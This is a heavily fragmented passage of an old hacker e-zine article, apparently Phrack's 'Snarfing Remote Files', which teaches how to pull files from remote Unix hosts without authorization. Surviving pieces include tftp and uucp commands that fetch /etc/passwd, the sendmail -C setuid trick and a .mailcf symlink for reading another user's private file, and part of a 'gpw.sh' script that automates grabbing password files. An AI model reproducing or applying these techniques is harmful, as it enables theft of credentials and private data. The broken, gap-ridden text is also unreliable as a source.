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ree, Issue 28, File #6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Snarfing Remote Files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by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Dark OverLord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of getting copies of files from a remote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permission to read or an account on login on to and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Many administrators do not even bother to restrict ma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imples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Use uucp(1) [Trivial File Transfer Protocol] to retrie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if you are running on an Internet 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buse uucp(1) [Unix to Unix Copy Program] to retrieve a copy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ucp connections are running o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ccess one of many known security loop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, we will use the passwd file as the fil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readable file that can be found on most system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re val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start the tft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You have the following prompt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ext step is to connect to the system that you wish to retrie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 At the tftp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 connect other.syst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request the file you wish to get a copy of (in ou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d file /etc/passwd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 get /etc/passwd /tmp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You should see something that looks like the following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185659 bytes in 2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exit the tftp program with the "qui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 copy of other.system.com's passwd file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Unix systems' tftp programs have a different syntax.  The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under Sun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pollos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tp -{g|g!|p|r|w} &lt;local file&gt; &lt;host&gt; &lt;foreign file&gt; [netascii|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 -g password_file networked-host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local "man" pages for more info (or in other words RTF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article, I will include a shell script that will snar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 from a remote host.  To use i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w syste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e are getting the file  /etc/passwd  from the system uusuc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has a direct uucp connection to that syste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copy of the file through the uucp links.  The following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a copy of the passwd file be copied into uucp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-m uusucker!/etc/passwd '&gt;uucp/uusucker_passw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"-m" means you will be notified by mail when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possible way to access the desired file requi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permissi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will utilize a well-known bug in Unix's sendmail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mail program has and option "-C" in which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use (by default this file is /usr/lib/sendmail.c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sendmail.cf).  It should also be noted that the diagnostics outpu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contain the offending lines of text.  Also note that the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setuid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can abuse this set of facts (if you have not yet guessed)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file you wish read as the configuration file.  Thu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ail -C/usr/accounts/random_joe/privat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copy of random joe's priv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ilar trick is to symlink your .mailcf file to joe's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 When mail executes sendmail (to send the mail), it will lo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f and barf out joe'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ink joe's file to your .mailc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 -s /usr/accounts/random_joe/private/file $HOME/.m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nd mail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C488869@umcvmb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Cut Here=-=-=-Cut Here=-=-=- gpw.sh =-=-=-Cut Here=-=-=-=-Cut Here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pw copyright(c) Dark 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ucb/tftp $1 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/etc/passwd /tmp/pw.$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Cut Here=-=-=-Cut Here=-=-=-Cut Here=-=-=-Cut Here=-=-=-=-Cut Here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MESS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PHRACK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